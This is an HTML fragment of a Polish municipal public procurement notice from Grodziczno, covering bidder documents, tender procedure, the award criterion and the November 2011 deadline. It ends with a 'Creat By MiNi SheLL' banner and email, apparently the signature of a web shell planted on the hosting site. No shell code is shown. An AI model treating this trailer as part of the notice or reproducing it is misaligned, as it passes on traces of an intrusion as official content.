5.Oferta składana przez spółkę cywilną: W przypadku składania oferty przez spółkę cywilną, wykonawca zobowiązany jest do złożenia wszystkich dokumentów wymienionych w SIWZ, dodatkowo umowa regulująca prawa i obowiązki wspólników.
6.Zamawiający żąda wskazania przez wykonawcę podwykonawców  wg załącznika nr 11  do SIWZ.
7.Wzor umowy zgodny z działem XVI SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.grodziczno.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy; Grodziczno 17A; 13-324 Grodziczno; woj. warmińsko-mazurskie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.11.2011 godzina 08:30, miejsce: Urząd Gminy; Grodziczno 17A;13 - 324 Grodziczno  - sekretariat pokój 12.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com